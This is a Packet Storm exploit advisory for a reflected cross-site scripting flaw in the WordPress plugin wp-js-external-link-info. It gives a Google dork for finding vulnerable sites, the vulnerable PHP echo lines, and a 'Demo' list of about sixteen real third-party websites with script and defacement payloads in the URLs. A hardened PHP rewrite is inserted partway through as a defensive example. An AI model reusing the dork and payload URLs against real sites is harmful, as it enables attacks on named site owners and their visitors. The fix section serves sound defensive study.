WordPress JS External Link Info Cross Site Scripting

2014-04-19T00:00:00
ID PACKETSTORM:126238
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2014-04-19T00:00:00

Description

                                        
                                            `#########################################  
# Exploit Title : Wordpress Wp Js External link Info Cross Site Scripting  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Vendor Homepage : http://wordpress.org  
#  
# Google Dork : inurl:wp-content/plugins/wp-js-external-link-info  
#  
# Date : 2014/4/16  
#  
# Tested on : Windows 7 , Linux  
#  
# Version : 1.21  
#  
######################  
# Exploit : Cross Site Scripting  
# Location : [Target]/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=[XSS]  
#  
######################  
# Vulnerable Code :  
# [CODE]  
  
$url = $_GET['url'];               // attacker-controlled, never validated  
$blog = urldecode($_GET['blog']);  // decoded a second time: PHP already decodes query-string values once  
...  
<?php echo $url; // reflected into the page without HTML encoding ?>  
<?php echo $blog; // reflected without encoding: the blog=[XSS] vector above ?>  
  
# [/CODE]  
#  
###  
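The two unescaped echo calls above are the whole defect. For comparison, here is a hardened version of that fragment, written as an added example for this page (it is not the plugin's own code): only the parameter names `$url` and `$blog` come from the advisory, and the surrounding page markup is assumed. It drops the second `urldecode()` (double decoding lets `%253C` slip past any upstream filter that only looks for `%3C`), accepts only absolute http/https URLs for the redirect target so `javascript:` links cannot be injected, and encodes every reflected value with `htmlspecialchars()` for both element-content and attribute contexts:

```php
<?php
// Added example: hardened rewrite of the unescaped echo calls from the
// advisory. Not the plugin's code; $url/$blog are the advisory's names,
// everything else (markup, helper names) is an assumption.
declare(strict_types=1);

/**
 * Return $value if it is an absolute http(s) URL, otherwise $fallback.
 * Keeps javascript: and data: URIs out of the redirect/link target.
 */
function safe_external_url(?string $value, string $fallback = '/'): string
{
    if ($value === null || $value === '') {
        return $fallback;
    }
    if (filter_var($value, FILTER_VALIDATE_URL) === false) {
        return $fallback;
    }
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $value : $fallback;
}

/**
 * HTML-encode a value for element content or a quoted attribute.
 * ENT_QUOTES also encodes the single quote so attribute contexts are safe;
 * ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
 */
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

$url  = safe_external_url($_GET['url'] ?? null);
// No urldecode(): PHP has already decoded the query string exactly once.
$blog = $_GET['blog'] ?? '';
?>
<!doctype html>
<meta charset="utf-8">
<p>You are leaving <?= html_escape($blog) ?>.</p>
<p><a href="<?= html_escape($url) ?>" rel="noopener noreferrer">Continue to <?= html_escape($url) ?></a></p>
```

With this in place the advisory's `blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E` request renders as literal text (`&lt;Script&gt;...`) rather than executing, and a `url=javascript:...` value falls back to `/`. In a WordPress plugin the same result is normally reached with the core helpers `esc_html()`, `esc_url()` and `esc_attr()`; the point is the same, encode on output for the context you are writing into.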
Demo  
  
# http://www.timefederalsavings.com/newsite2/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.motiv.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://www.blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://sectank.net/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://bkalitva.ru/blog/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.thfcu.org/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
# http://openwebstuff.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.londonfootball.org.uk/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%22%3E%3Cmarquee%3EHacked%20By%20Milad%20Hacking%20TEST%20XSS%20Loool%3C/marquee%3E  
#  
#  
# http://www.ilikesharepoint.de/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://accordnetwork.org/forum/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://blog.al8z.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://michelearnese.it/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.city-infos.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://konaproperty.com/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.degrotelongontstekingmeting.nl/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
# http://www.cityblogs.nfo.ph/wp-content/plugins/wp-js-external-link-info/redirect.php?blog=%3CScript%3Ealert%28/test/%29%3C/Script%3E  
#  
#  
#  
############################################  
  
Discovered By : Milad Hacking  
  
We Love Mohammad  
  
Mail : milad.hacking.blackhat@gmail.com  
  
Home Page : https://www.facebook.com/milad.hacking.5  
  
############################################   